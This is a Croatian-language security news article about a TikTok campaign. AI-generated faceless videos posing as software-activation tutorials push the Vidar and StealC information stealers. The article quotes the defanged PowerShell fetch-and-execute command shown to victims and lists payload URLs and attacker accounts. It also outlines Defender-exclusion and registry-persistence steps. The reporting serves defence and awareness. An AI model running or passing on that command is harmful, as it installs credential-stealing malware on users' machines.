Zločinci su otkrili novo bojno polje za distribuciju zlonamjernog softvera koristeći ogromnu bazu korisnika i algoritamski doseg TikToka.
Pojavila se sofisticirana kampanja društvenog inženjeringa koja koristi videozapise generirane umjetnom inteligencijom (AI) kako bi prevarila korisnike na preuzimanje opasnog zlonamjernog softvera za krađu informacija, prerušenog u tutorijale za aktivaciju softvera.
Ovi obmanjujući videozapisi obećavaju pomoć korisnicima u aktivaciji legitimnih aplikacija poput Windows OS, Microsoft Office, CapCut i Spotify, ali umjesto toga isporučuju poznate alate za krađu informacija Vidar i StealC nesuđenim žrtvama.
Ova kampanja predstavlja značajnu evoluciju u taktici distribucije zlonamjernog softvera, udaljavajući se od tradicionalnih metoda isporuke putem weba i iskorištavajući povjerenje i angažman inherentne u platformama društvenih medija.
Za razliku od uobičajenih napada koji se oslanjaju na zlonamjerne web-lokacije ili phishing e-poštu, ova operacija ugrađuje sve elemente društvenog inženjeringa direktno u video sadržaj, čineći detekciju značajno težom za sigurnosna rješenja.
Napadači iskorištavaju viralnu prirodu TikToka, pri čemu je jedan zlonamjerni videozapis prikupio gotovo 500.000 pregleda, preko 20.000 lajkova i više od 100 komentara, što ukazuje na alarmantan doseg i učinkovitost kampanje.
Analitičari Trend Micro-a identificirali su više TikTok naloga uključenih u ovu operaciju, uključujući @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc i @digitaldreams771, od kojih su svi od tada deaktivirani.
Istraživači su primijetili da su ovi računi objavljivali upečatljivo slične videozapise bez lica s glasovima generiranim umjetnom inteligencijom, što sugerira automatizirani proces proizvodnje dizajniran za skalabilnost.
Tehnička sofisticiranost napada postaje očita u njegovoj metodologiji izvršavanja.
Žrtvama se nalaže da otvore PowerShell i izvrše naizgled bezopasan naredbu: iex (irm hxxps://allaivo[.]me/spotify). Ovaj PowerShell skript pokreće višestupanjski proces infekcije koji demonstrira napredne tehnike izbjegavanja.
Mehanizam infekcije i taktike postojanosti
Lanac infekcije zlonamjernog softvera otkriva pažljivo orkestrirane korake osmišljene da osiguraju uspješnu kompromitaciju, a pritom izbjegnu detekciju.
Nakon izvršavanja, početni PowerShell skript stvara skrivene direktorije unutar korisničkih APPDATA i LOCALAPPDATA mapa, odmah dodajući te lokacije na popis isključenja programa Windows Defender kako bi se spriječilo skeniranje antivirusnim programom.
Zatim skript preuzima primarni teret sa adrese hxxps://amssh[.]co/file.exe, koji sadrži varijante zlonamjernog softvera Vidar ili StealC.
Mehanizam postojanosti uključuje preuzimanje dodatnog PowerShell skripta sa adrese hxxps://amssh[.]co/script[.]ps1 i uspostavljanje ključa registra koji osigurava izvršavanje zlonamjernog softvera pri pokretanju sustava.
Valja napomenuti da Vidar koristi inovativnu strategiju komandno-kontrolnog nadzora, zloupotrebljavajući legitimne usluge poput Steam profila i Telegram kanala kao “Dead Drop Resolvers” za skrivanje stvarnih adresa C&C servera, čineći napore na detekciji i uklanjanju znatno složenijim.